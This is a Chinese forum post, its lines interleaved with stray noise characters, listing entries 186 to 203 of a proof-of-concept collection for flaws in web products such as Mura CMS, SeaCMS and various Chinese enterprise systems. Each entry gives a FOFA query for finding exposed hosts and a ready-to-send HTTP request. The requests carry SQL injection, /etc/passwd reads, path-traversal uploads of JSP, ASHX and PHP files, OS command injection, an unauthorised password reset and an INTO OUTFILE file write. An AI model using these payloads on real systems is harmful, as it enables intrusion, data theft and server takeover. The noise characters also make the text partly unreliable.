" |1 F" e% E4 H* v( i' {) K6 bGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
9 _2 ?8 Y V% ~& a q! p1 IHost: host3 x; d8 c7 S; p, `4 T6 x, a
% j7 }& Y6 ?6 i+ T" \1 E5 ~' d0 s' b7 @
186. F-logic DataCube3 SQL注入% r; v& J" U" Y( y5 Y" a
CVE-2024-31750
/ U8 u% O7 G7 G3 N1 wF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统6 |9 m1 N3 R) D, Z4 y
FOFA:title=="DataCube3"* A2 z: h( e; |' s- `2 R
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
7 w- {9 A7 n) s! w! {Host: your-ip$ Y2 L- R6 P4 W" Q6 c9 t; o) a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0; Y3 U; M! Y! M4 t- X ?, [6 w( G2 [, c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
5 B6 v: B ]4 ^ B. l& BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# {: h+ H3 [% y! J I- v
Accept-Encoding: gzip, deflate
- Z- }- N8 @$ D3 L5 |Connection: close
) f- z% I" @9 }Content-Type: application/x-www-form-urlencoded' U0 t7 q2 p" Z1 T% @* n
- ?2 {" A9 i% M" v; mreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
) N6 c9 @- m' g6 g8 z$ @# P
: C8 G" e. {( x# @, P" `; e5 S* v- j, P. z3 F) P$ Z
187. Mura CMS processAsyncObject SQL注入 B' l9 S) N: a' E9 \% [" A7 D
CVE-2024-326407 Q, ~2 M9 |5 p3 } h4 O
FOFA:"Mura CMS") f$ c% `4 }* E5 n# E- a* J
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
% Y4 p. \, l2 I! X0 N7 F/ y/ ~Host: your-ip
# `! n9 D( O" b$ WContent-Type: application/x-www-form-urlencoded& A$ ]* K; D8 ^5 V. m* K Z
' K- t0 F6 F" Y
3 ?9 I6 M+ k3 J0 O1 @5 t' X$ u/ z
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=18 F7 H' c T. d9 s; Q
% K# o1 u" Y0 d- ]1 h
6 C9 w6 P2 M, @) C$ q188. 叁体-佳会视频会议 attachment 任意文件读取
: q! f) S/ p1 n- b8 K; mversion <= 3.9.7
; [& @+ v; q& S# M4 Q1 l5 `FOFA:body="/system/get_rtc_user_defined_info?site_id"7 I3 o! a, M- S: ?3 N) a
GET /attachment?file=/etc/passwd HTTP/1.1
0 B0 O9 D, G& V7 {& K+ wHost: your-ip
4 s( |9 {1 N. w' g( p" B5 ~1 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) K6 E7 i$ C/ b, H& _, ]9 J+ hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) R: R2 R6 O$ e! {$ |) T# {Accept-Encoding: gzip, deflate7 p, B. o) ~- s0 D N6 H
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ P# ^; ~ Q( B) W6 kConnection: close
9 }, z) Y @8 I) E. x3 t8 e% g
8 s$ \) Y0 O& O. i
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
( r" x X# Z, g1 mFOFA:app="LANWON-临床浏览系统"
: k( k: | B; j( tGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
7 U( K9 z; l0 u8 v( aHost: your-ip, Q8 P0 O4 H; N; i7 g
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* j: b6 K, W8 ^$ Y0 g5 n/ ]0 X3 l' ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- ?' o, ^# |' I& b# c, @6 e6 P
Accept-Encoding: gzip, deflate
9 P* X: Q' c! Q8 @) C8 k- h, O- c6 uAccept-Language: zh-CN,zh;q=0.9
1 b" b) K5 a$ j# W. b1 @Connection: close
6 f3 g. m+ L" V7 s) e0 C
% B2 [; Q/ |- }1 z
7 @. j' q# n; M. d9 U4 t190. 短视频矩阵营销系统 poihuoqu 任意文件读取" b2 s+ c+ P6 y1 I$ [& H1 G; K
FOFA:title=="短视频矩阵营销系统"
* o' |4 v$ N3 c) ~6 KPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
: I0 F* ~0 l8 E/ ]) f) [Host: your-ip; q( Q5 A9 ~8 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
7 T& v! G7 ]' r3 y- M; zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9* \9 Z# }/ n7 d+ f& u
Content-Type: application/x-www-form-urlencoded% ]" {! S8 H. ^! U( p# v: M& c4 r
Accept-Encoding: gzip, deflate
* `) |; \+ L( I7 ?! Y$ m, {Accept-Language: zh-CN,zh;q=0.9
+ a/ D0 M' E" V+ u% n: D
1 _$ D5 @! z: H' S6 npoi=file:///etc/passwd" D* N9 n$ e! |
; E; Y" h+ [" v
2 u, I& q: M3 q [7 b. I4 U1 }191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入7 p1 u/ \4 x# ?9 s
FOFA:body="/CDGServer3/index.jsp". ]5 ?4 F* q1 R- w5 ]8 ~( O3 S
POST /CDGServer3/js/../NavigationAjax HTTP/1.17 |& I9 |4 i) @% P
Host: your-ip6 s) J" e# g0 R% f6 B$ t$ U1 G+ ]+ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 l/ g* M% w% i. q4 n& j
Content-Type: application/x-www-form-urlencoded6 q' c1 i1 n( X' v6 ~, t3 M" e
3 F ?2 b& ?% H2 @
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=& O, L) U8 k! v2 v; ^
1 N" z+ f7 a0 N) R/ y4 ~/ _+ M4 U4 [6 F2 `
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传- `3 U( p" X8 m. H; o4 ~! l1 w v% H
FOFA:title="用户登录_富通天下外贸ERP"
5 @0 {! k+ T- \' dPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.13 g0 g, j3 R* p' s
Host: your-ip
; f* ?) {% U) z8 O1 a5 w: IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
( a+ N6 W. e7 rContent-Type: application/x-www-form-urlencoded& t# N2 l, W! G
5 S9 k+ X5 l- y1 @3 U* A
. X) t$ b/ C$ J' L4 `
<% @ webhandler language="C#" class="AverageHandler" %>8 Z3 _3 U( p% k' b; j' t+ x& }
using System;6 @5 J% x- w( q8 d
using System.Web;3 K. A7 d0 S) D! T5 K' x
public class AverageHandler : IHttpHandler( t% ^ d" x& o% _. |
{! X- G9 R& G; s4 O1 H% F$ y
public bool IsReusable
6 I! X' C, I3 v. v{ get { return true; } }5 Y& G2 r) Q% a
public void ProcessRequest(HttpContext ctx)* S9 Y' `- V) v5 K$ J9 N5 W' Y
{# ]# E/ t9 R: C! U- H
ctx.Response.Write("test");
; q+ c/ Z7 _$ ^& e- c0 N}
# ~" m7 A7 M# Q}
7 g* t2 c5 X; v! \& ^
+ d6 _& C. O# h1 `
3 ]5 L; Q- E% i( A5 S; K! p3 D193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
. e& u: @" c, c7 T3 IFOFA:body="山石云鉴主机安全管理系统"; u; Z, O: n4 m5 ^
GET /master/ajaxActions/getTokenAction.php HTTP/1.13 `9 @% f. r& T- e5 _. \. C/ @
Host:
; v, n# Y$ H, n; c1 _& F, ]Cookie: PHPSESSID=2333333333333;
, a9 ?$ n3 @0 e, oContent-Type: application/x-www-form-urlencoded' }# j4 ] w4 A# q/ l1 C+ Z1 n
User-Agent: Mozilla/5.0
I7 c8 l4 ^) T8 }
, {; h$ z$ W$ z* F; y* D% v# H% H; \+ s$ U0 c1 ^4 Z2 u1 f/ l
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
. K6 w9 O7 H- j& |3 nHost:
) z+ D- |' P! j' B8 v; VUser-Agent: Mozilla/5.0
/ v* I/ C5 T% Y3 V1 P/ |Accept-Encoding: gzip, deflate
2 G+ b3 ?3 g- {$ i0 t" j" l" \/ GAccept: */*
* k8 V* L. e7 I/ X; PConnection: close# u' d u- k# J/ \5 P2 \
Cookie: PHPSESSID=2333333333333;$ M2 X" Z3 H5 P, A% `
Content-Type: application/x-www-form-urlencoded2 @5 T5 o0 X h; g
Content-Length: 84
: q) u% o3 b# d1 g q1 g" v
0 l+ ^* Z. \$ ~' [# Kparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config') U6 Q5 ?5 X0 T2 u
5 b9 D7 n8 M" c/ q
# l9 L9 d1 o. H6 ?- B& DGET /master/img/config HTTP/1.1
( c8 B4 a- E+ O" h; PHost:* e9 v9 a$ ~7 c l" t6 ?
User-Agent: Mozilla/5.0
& X" X+ b. D' d6 {% a! i, ~9 ~ R4 V+ D$ \! v, q2 `* n
3 f6 V6 P, x9 x1 |) Q/ u
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. n- g8 E' ~! }& p YFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在/ d8 u X, w7 e( x# J& ~
$ R9 W, ]$ O9 H9 m5 k
POST /servlet/uploadAttachmentServlet HTTP/1.1
p. p7 e- s: Z7 p, vHost: host; E& C( s6 L! ^* ^4 S$ t5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36' t# R* k5 o. q$ M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, [; Z5 p! u6 x7 ]; iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: G9 J0 H ~9 e0 P) TAccept-Encoding: gzip, deflate
2 M4 P: i& H2 ^Connection: close- S% W; ?3 e; w/ f; C6 k8 C/ M. [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk% c* w- I7 d* V; t. |
------WebKitFormBoundaryKNt0t4vBe8cX9rZk |7 T% f" ] N$ b# ^8 b8 ~
% i' d- }: y" y0 m1 `* Z* S
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
) q* }9 v' D, X( QContent-Type: text/plain
" `5 d7 b! O& k$ `) b* H8 e& x<% out.println("hello");%>
9 `8 R5 ~! p/ N------WebKitFormBoundaryKNt0t4vBe8cX9rZk0 c4 p0 f+ W6 P3 w5 W! L
Content-Disposition: form-data; name="json"/ q8 a# a9 a' E" C A
{"iq":{"query":{"UpdateType":"mail"}}}0 q% j( |6 Y9 u
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
) n! g) X$ P, `$ z) X+ S2 Z, D Z' Q5 ]8 P9 q
& C) T9 Q' i+ I$ K+ T% j4 ?* }
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
, [; q% M) Q2 A- A- s% QFOFA:title=="飞鱼星企业级智能上网行为管理系统& g/ V6 R: P& W: x6 c
POST /send_order.cgi?parameter=operation HTTP/1.1
* \0 k' q% P/ p5 v x3 QHost: 127.0.0.1% g" ]+ S, `0 N; J( s
Pragma: no-cache
$ }7 D( g9 R2 H* e% ?$ qCache-Control: no-cache8 V$ {( G, P k6 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, A! e* y/ B( v
Accept: */*5 S) L/ a+ b5 F0 b
Accept-Encoding: gzip, deflate
8 Q: {; o* V+ W& q1 D6 H T9 bAccept-Language: zh-CN,zh;q=0.9: R6 F7 B2 c$ z! V9 T% @6 R' o
Connection: close
- b6 T+ x5 P/ E) j3 o# Z" m3 dContent-Type: application/x-www-form-urlencoded
' G7 Y2 {2 _( W7 h! ^% `+ UContent-Length: 68
* ]5 r b& C( r1 |/ f1 |( M+ ]6 X# q+ N8 [& d
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}$ ^: H9 N6 U% {8 R
+ l) K: M( D7 i, L6 e7 Y, F" V3 j6 r) o" ~& I% T8 C
196. 河南省风速科技统一认证平台密码重置# [# {# B% D* w% H
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
0 R* e* J; W' a1 mPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1 Y: Y+ O( f6 m j0 l" g, `! p+ s4 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 g/ B, H `$ a: N
Content-Type: application/json;charset=UTF-8
. I/ S B/ `) a& m4 t8 S3 JX-Requested-With: XMLHttpRequest
5 B) u" s+ k. q0 o& ~% x4 j+ HHost:
7 |$ j/ ?" W% Y; M, t( ] EAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
4 V7 v9 u* A- D4 o, ~6 D% pContent-Length: 45: M# f' p. F! G3 A
Connection: close/ F1 @2 c5 v# t C
0 ~' G/ ^. U) I8 A, k( _" r{"xgh":"test","newPass":"test666","email":""}+ a& R7 s* W% ?# H
1 s( W; g" Y) \5 O8 n _: K- V; [! }
1 X& y7 ?' e2 K4 _197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入( f# f0 B+ A8 g9 M" D0 C; p" t
FOFA:app="浙大恩特客户资源管理系统"% K# o! u& K6 L0 n- U. u
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
2 w0 O" Q8 C: ~5 RHost: R* {4 a+ }2 U/ U( f; j1 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
% E+ {4 Z2 y1 B$ }( WAccept-Encoding: gzip, deflate5 ?9 I1 |" C U# K& G
Connection: close
7 ^# m. a$ b" ?0 z9 S3 x! {. G& q7 G9 G
2 q' ]4 Z1 O% p; D. R+ E- u8 U3 h) o8 V
! s4 O0 l* F- {$ ^, g" y+ s) N; [+ V198. 阿里云盘 WebDAV 命令注入" f) s# @0 |. w0 R5 Y" m
CVE-2024-29640
; m: K: y+ t" o4 [GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.11 R6 f* O4 T4 D: A) Y
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf647 a! b3 H) w: ?. D' Z- w
Accept: */*
+ k/ R+ [% r1 B: g5 J; uAccept-Encoding: gzip, deflate. D0 i9 ~8 `/ @! Y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.60 a7 P) F7 _9 k* Y% v z
Connection: close7 H; A4 N- ?, E2 E+ R
1 h1 v; m9 z1 }$ H8 Y6 @/ @8 j$ }
9 M9 y# V% O: [. |& w( T% A7 ~
199. cockpit系统assetsmanager_upload接口 文件上传
4 M) \* s" Y T- _1 A: s5 w7 {) @) e: S) K+ J
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:; B0 P4 \3 _, K% l) _- m
GET /auth/login?to=/ HTTP/1.11 ~ \. P8 Z' j1 f
# c9 B9 X1 k6 `+ U( l: S响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
1 V9 Z) z- D6 w2 y; h! A
3 w' `/ x1 Y9 B, k2.使用刚才上一步获取到的jwt获取cookie:
$ L# N+ Z0 h( A( x9 O I- \' F. v3 _1 a* D( G7 b" g4 c3 u9 ~! ?! Y
POST /auth/check HTTP/1.1; \/ z2 h; I' L+ u5 N3 v* ?
Content-Type: application/json
/ i5 W4 _0 a$ d! P% X" A U4 n& r0 q# n/ y( x4 G2 e0 Q
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
- G/ h M, ]0 s% ?
. n4 t( v2 A3 H, W/ {4 q2 \6 f( f响应:200,返回值:
! I s9 T9 }( i% \0 {9 w# cSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
0 J1 r% G6 d8 r5 k, Y2 V- ]Fofa:title="Authenticate Please!"* N+ @, D7 X: d3 t; ?
POST /assetsmanager/upload HTTP/1.1
% Q" R' `0 J& T, S9 gContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3 Z6 q+ @( Q) k& a5 L
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
. G- Z* J) [7 K. }9 Y0 n
0 e5 w; J% [/ h- I) {8 I-----------------------------36D28FBc36bd6feE7Fb3. N( P; ^3 x9 C) h* d5 e7 r
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
7 v' `: y) a3 `' i: f% T- f4 uContent-Type: text/php
# t0 N1 H! ]% ?, u* `$ ^5 b( }2 t1 Z0 ]0 Q0 L$ z
<?php echo "tttt";unlink(__FILE__);?>- h* k; c/ O, M7 X* C& h
-----------------------------36D28FBc36bd6feE7Fb3
0 U# m; F: F" `% @( z* SContent-Disposition: form-data; name="folder"
' q6 \1 ^1 w1 W/ d; T) u ^5 v' y
5 E9 v e: V( R$ ]-----------------------------36D28FBc36bd6feE7Fb3--
% g6 V' G7 E; M: G% w6 |8 S( P7 A: A$ `
9 G" Y) X8 g$ s
/storage/uploads/tttt.php
+ G$ q9 Y; J1 [* ~
6 ]8 d8 U+ A! ^. ~/ y" P+ ]200. SeaCMS海洋影视管理系统dmku SQL注入' \- Z% M+ M% F# u- V9 a8 M$ W
FOFA:app="海洋CMS"" \3 b. j! L# _3 r9 X) ^
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1* S0 b2 S! j7 w
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s) a1 |% Z3 `8 v H% _
Upgrade-Insecure-Requests: 1
* b& z0 s3 j( u8 rCache-Control: max-age=0
7 U% x# w! g0 S( L! O' mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 q/ X' i6 `4 V3 B+ b7 I& f8 `
Accept-Encoding: gzip, deflate% M5 ?0 c5 ^" H
Accept-Language: zh-CN,zh;q=0.9/ }7 Y y0 ^+ K7 w
& n- ?1 n/ t# O% R0 J* x' W# m P: s
: W; ^& _; N5 R0 o8 b201. 方正全媒体新闻采编系统 binary SQL注入
- Q& d) A8 j; V4 |FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
! |/ l3 \* m- pPOST /newsedit/newsplan/task/binary.do HTTP/1.12 A( ]( r( o1 T$ [2 k" Z
Content-Type: application/x-www-form-urlencoded
/ J! I9 K5 e! W% o0 m0 E( ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( G- N0 t! W" w6 j* e( SAccept-Encoding: gzip, deflate' O9 A4 l0 k; z9 _* [
Accept-Language: zh-CN,zh;q=0.9
: o* q- Q$ [6 o, U y9 S1 P9 M9 b! WConnection: close
5 s @- A( g6 E9 w: V, U0 I9 p& z% u
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
t5 }$ a# {& c& R& p" k1 I1 z9 `0 e
" j3 x8 l4 `* q6 n
202. 微擎系统 AccountEdit任意文件上传
2 y4 |- \9 M4 _FOFA:body="/Widgets/WidgetCollection/"
9 D k/ k+ `% z7 W# z& f, }- v获取__VIEWSTATE和__EVENTVALIDATION值
; Z1 [1 w6 E- N! pGET /User/AccountEdit.aspx HTTP/1.16 G V' z0 |" n) x3 C
Host: 滑板人之家
; j% R: h- r' Q) P1 x6 R, r. R _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
: ]! F2 x* j. |: K9 @Content-Length: 0
! c0 [0 h4 u2 Q* A8 x9 @
: o+ |; N4 Z6 c6 M2 w3 V( v( t& W6 Q
4 c ?. R9 s" j3 q& I替换__VIEWSTATE和__EVENTVALIDATION值
" x. n3 M9 ~4 SPOST /User/AccountEdit.aspx HTTP/1.1$ X- U" [6 r) K4 D x6 p# D
Accept-Encoding: gzip, deflate, br
7 K2 s7 S: c+ ?5 B, @$ N9 \Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
- X1 n5 X* `7 Z% O- z; u8 W$ |; a* {1 C
-----------------------------786435874t38587593865736587346567358735687
/ `9 K* D2 c% Y& xContent-Disposition: form-data; name="__VIEWSTATE". k# p8 }, b% B! _9 T* m4 ]" p
+ C3 X# I( B- b4 a, Q( f/ O
__VIEWSTATE! `' G7 o3 t+ E& z: `3 F$ ~9 P
-----------------------------786435874t385875938657365873465673587356871 J: |- @) T& a; b3 S
Content-Disposition: form-data; name="__EVENTVALIDATION"9 ?# C. i9 X! G1 y: o* u
3 h6 h x" o- O+ k5 Z
__EVENTVALIDATION1 e9 c4 T, J$ `! x
-----------------------------786435874t38587593865736587346567358735687: B/ H8 F* U, o8 L4 c
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"9 f# P+ P$ z4 h
Content-Type: text/plain3 }1 r- z* G4 r6 N9 ~$ b5 U
' V& f6 K! `6 e& `; q, m
Hello World!# [: L6 {7 n2 G2 u9 V! W% d5 M% P2 F
-----------------------------786435874t38587593865736587346567358735687. O+ Y& g( a4 s9 d0 V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
$ r& i, i: ^( w8 G9 u I- h3 f3 S4 C% H1 J6 o7 B
上传图片0 H* l& W' t3 j/ p* a
-----------------------------786435874t38587593865736587346567358735687/ B8 Q! V0 k1 y+ q4 q0 M
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
' ^- P# L9 E, x" u: r
7 S' d7 Z5 \2 s. k& |4 J: H' Q) r0 D4 N7 K
-----------------------------786435874t38587593865736587346567358735687 P; R3 H. p2 }( i- [' n
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
; |% M( K, e4 K+ {5 p" b# {' K/ _- g6 s! U
L T6 e5 }1 R' u, ?5 \-----------------------------786435874t38587593865736587346567358735687--' m% A' r8 z, C! Z& S4 F& V
: X2 ]3 k3 \7 _0 Z7 S' k6 k6 u& S5 d, V5 Z2 T+ M
/_data/Uploads/1123.txt, @( z. d5 J) c `# E9 L5 g
{- t' w* o2 H+ {. A- z1 @1 i
203. 红海云EHR PtFjk 文件上传" M% u3 K+ p: j8 {% X' r
FOFA:body="RedseaPlatform"
: _+ o$ c; P+ U: S4 C, f" dPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
& F3 A6 ]! J* [0 {$ nHost: x.x.x.x
1 g1 U5 W8 [! b0 D9 K. e r6 m7 hAccept-Encoding: gzip
8 u" H0 }2 G5 a$ C" c( rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% f- Y8 b- J0 n( e" \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
+ H5 a7 Y% _: M/ | yContent-Length: 210
* r7 t! B& i: |+ Y/ O& m( d9 ~% _1 ^8 Q, s' _: [
------WebKitFormBoundaryt7WbDl1tXogoZys4
. p* z( D8 P1 }9 K! k+ GContent-Disposition: form-data; name="fj_file"; filename="11.jsp". m; x# `4 ~' O2 F" |
Content-Type:image/jpeg" @: ]( G4 |! ?. c' r% a
4 U' y9 m" f; [4 I* C4 C7 [8 }6 E/ L8 {<% out.print("hello,eHR");%>' ]) G: b4 Q; W1 R: N# j; w* |
------WebKitFormBoundaryt7WbDl1tXogoZys4--; @7 c1 O5 T+ e2 n! }" p
C. f8 a: f9 R- Y {
8 O7 S1 p( \9 `, }
8 n7 P4 M* @# j/ C" o/ @) |" B% Y& V# M2 M6 h3 X
* f& c: }5 G: a
* H' a ^8 k9 e0 z# ?% u9 H; ? |
发表于 2024-6-5 14:31:29
收藏
支持
反对